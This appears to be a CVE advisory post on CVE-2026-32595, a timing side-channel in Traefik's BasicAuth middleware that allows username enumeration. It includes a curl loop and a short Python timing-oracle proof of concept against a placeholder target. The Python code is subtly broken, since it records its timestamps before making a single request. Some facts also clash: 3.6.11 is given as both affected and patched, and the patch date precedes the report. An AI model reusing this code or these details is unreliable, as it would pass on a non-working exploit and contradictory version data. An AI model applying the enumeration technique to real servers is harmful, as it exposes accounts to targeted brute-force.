Traefik, Timing Side-Channel Username Enumeration, CVE-2026-32595 (Medium)

Listen to this Post

The vulnerability exists in Traefik’s BasicAuth middleware. When a submitted username exists, the middleware performs a bcrypt password comparison taking approximately 166ms. When the username does not exist, the response returns immediately in about 0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames.
A previous patch intended to introduce a constant-time fallback secret to mitigate this timing side-channel. However, due to a map key/value confusion in `basic_auth.go` at line 49, the variable `notFoundSecret` is always resolved to an empty string. As a result, the constant-time fallback calls goauth.CheckSecret(password, ""), which fast‑fails in about 1 microsecond instead of performing a full bcrypt evaluation (~60ms). This restores the original timing oracle, making the patch effectively a no‑op. The regression was confirmed both by a black‑box Python PoC (median ratio 130.4x) and an in‑tree Go test (ratio 12,746x).

DailyCVE Form

Platform: Traefik
Version: 2.11.40‑3.6.11
Vulnerability: Timing Side‑Channel
Severity: Medium
date: 2026‑03‑20

Prediction: Patch 2026‑03‑19

Analytics under heading What Undercode Say:

Measure response time differences using curl and time
for user in admin nonexistent; do
time curl -u "$user:wrongpass" http://target/protected
done
Python timing oracle (simplified)
import requests, time, statistics
def measure(user):
times = [time.perf_counter() for _ in range(20)]
requests.get("http://target/protected", auth=(user, "wrong"))
med = statistics.median(time.perf_counter() - t for t in times)
print(user, "exists" if med > 0.05 else "not found")

Exploit:

An attacker sends repeated HTTP Basic Authentication requests to a protected endpoint. For each candidate username, they measure the server’s response time. Users that exist trigger a bcrypt comparison (~166ms), while non‑existent users return almost instantly (~0.6ms). By comparing the median response times over a few dozen samples, valid usernames can be reliably enumerated.

Protection from this CVE

  • Upgrade to Traefik 2.11.41, 3.6.11, or 3.7.0‑ea.2 (the patched versions).
  • If an immediate upgrade is not possible, apply a constant‑time authentication wrapper that always performs a bcrypt comparison, regardless of username existence.
  • Monitor authentication logs for unusual clusters of `401` responses that exhibit suspiciously low latency.

Impact

  • Confidentiality: Valid usernames are exposed without requiring any prior knowledge.
  • Attack Surface: Enables targeted password brute‑force attacks on confirmed accounts.
  • Compliance: May violate regulations requiring protection against side‑channel leaks (e.g., PCI DSS, ISO 27001).
  • Risk Level: Medium – remote, unauthenticated, low complexity, but only username enumeration (not password compromise).

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top